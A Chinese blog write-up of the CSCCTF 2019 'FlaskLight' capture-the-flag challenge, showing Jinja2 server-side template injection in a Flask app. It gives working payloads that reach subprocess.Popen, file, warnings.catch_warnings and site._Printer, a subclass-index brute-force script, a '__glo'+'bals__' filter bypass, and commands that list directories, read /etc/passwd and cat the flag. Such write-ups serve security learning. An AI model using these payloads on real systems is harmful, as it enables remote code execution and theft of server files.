[CSCCTF 2019 Qual]FlaskLight 过滤 url_for globals 绕过globals过滤

双层小牛堡2023-10-05 20:28

目录

subprocess.Popen

FILE

warnings.catch_warnings

site._Printer

这题很明显就是 SSTI了

源代码

我们试试看

{{7*7}}

然后我们就开始吧

原本我的想法是直接{{url_for.globals}}

但是回显是直接500 猜测过滤 我们正常来吧

复制代码 
{{"".__class__}}  查看当前情况

{{"".__class__.__base__}} 查看基类 这里发现没有利用的 我们修改代码

{{"".__class__.__mro__}}  查看全部类  发现存在<type 'object'>了



{{"".__class__.__mro__[2].__subclasses__()}}  查看object的子类

这里我们需要 os 来调用

但是这里存在一个类 可以不需要os

subprocess.Popen

Python3 subprocess | 菜鸟教程

需要参数

复制代码 
("命令",shell=True,stdout=-1)

这里 stdout  就是指定输出 PIPE

然后我们可以使用 其方法来进行交互

复制代码 
("命令",shell=True,stdout=-1).communicate()

这样我们就可以实现rce

首先通过 脚本跑出来其的位数

复制代码 
import time

import  requests

base_url="http://1a3ad76d-35d3-4a35-97fb-8997c87bf989.node4.buuoj.cn:81/?search="

for i in range(300):
    payload="{{\"\".__class__.__mro__[2].__subclasses__()[%s]}}"%i
    r = requests.get(url=base_url + payload)
    if "subprocess.Popen" in r.text:
        print(i)
    if r.status_code == 429:
        time.sleep(0.5)

跑出来是258

我们开始构造

复制代码 
?search={{''.__class__.__mro__[2].__subclasses__()[258]("ls",shell=True,stdout=-1).communicate()[0].strip()}}

最后的.communicate()[0].strip() 通过 communicate方法 输出 并且指定数组 去除空白符

我们看看 flasklight看看

复制代码 
?search={{''.__class__.__mro__[2].__subclasses__()[258]("cat /flasklight/coomme_geeeett_youur_flek",shell=True,stdout=-1).communicate()[0].strip()}}

FILE

这是另一个方法 通过file读取文件

首先我们要测试一下

先查找一下 file

发现是40

然后我们看看

复制代码 
{{"".__class__.__mro__[2].__subclasses__()[40]}}

/?search={{"".__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read()}}

读取成功

然后我们去读一下命令行吧

发现读出了路径

我们看看这个py

但是还是没有办法直接读取出来 因为不知道flag的文件名字

warnings.catch_warnings

我们首先找一下这个类的位数

59

复制代码 
{{"".__class__.__mro__[2].__subclasses__()[59].__init__}}

这里就卡住了 因为我们还是需要 globals的参与

我们如何绕过过滤呢

复制代码 
{{"".__class__.__mro__[2].__subclasses__()[59].__init__['__glo'+'bals__']}}

这样就可以

我们在上面也知道 是通过匹配过滤的

做到这个我们其实就可以正常rce了 但是还是完善一下这个类的用法吧

这里我们能发现 这个类没有加载 os 需要我们手动加载

我们需要在其

复制代码 
['__builtins__']['eval']

下导入

payload

复制代码 
?search={{"".__class__.__mro__[2].__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']("__import__('os').popen('ls').read()")}}

这样就借助 os 实现了 rce

site._Printer

我们知道了 globals可以拼接绕过

这个方法也可以实现我们看看里面是否内置了 os

复制代码 
?search={{"".__class__.__mro__[2].__subclasses__()[71].__init__['__glo'+'bals__']}}

发现存在 我们直接rce即可

复制代码 
?search={{"".__class__.__mro__[2].__subclasses__()[71].__init__['__glo'+'bals__']['os'].popen('ls').read()}}

最后读取即可

相关推荐
m***66732 小时前
【Sql Server】sql server 2019设置远程访问,外网服务器需要设置好安全组入方向规则
运维·服务器·安全
xinxinhenmeihao2 小时前
隧道代理和住宅IP有何不同》各有什么优缺点?
服务器·网络·tcp/ip
小兔薯了3 小时前
6. Linux 硬盘分区管理
linux·运维·服务器
努力的Andy3 小时前
Linux 云服务器新增硬盘:从分区、格式化到挂载的完整指南
linux·运维·服务器
裤裤兔3 小时前
linux卡在启动界面的解决办法
linux·运维·服务器·centos·centos7·linux系统
kka杰3 小时前
Linux:基础IO介绍-1
linux·运维·服务器
Xの哲學3 小时前
Linux slab分配器深度剖析:从原理到实践
linux·服务器·算法·架构·边缘计算
Murphy_lx3 小时前
Linux中信号量的相关操作
linux·运维·服务器
Hard but lovely3 小时前
linux: udp服务器与客户端 CS 基于ipv4的地址结构体
linux·服务器·udp
长沙红胖子Qt4 小时前
公司禅道笔记(一):公网服务器centos6上成功部署禅道20.8版本
服务器·禅道·研发管理·禅道云端部署
热门推荐
01GitHub 镜像站点02今天 Cloudflare 全球事故,连 GPT 和你的网站都一起“掉线”了03UV安装并设置国内源04安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)05Linux下V2Ray安装配置指南06BongoCat - 跨平台键盘猫动画工具07全球最强模型Grok4,国内已可免费使用!(附教程)08Valdi:Snapchat 开源的新一代跨平台 UI 框架09swagger xss漏洞复现10Labelme从安装到标注:零基础完整指南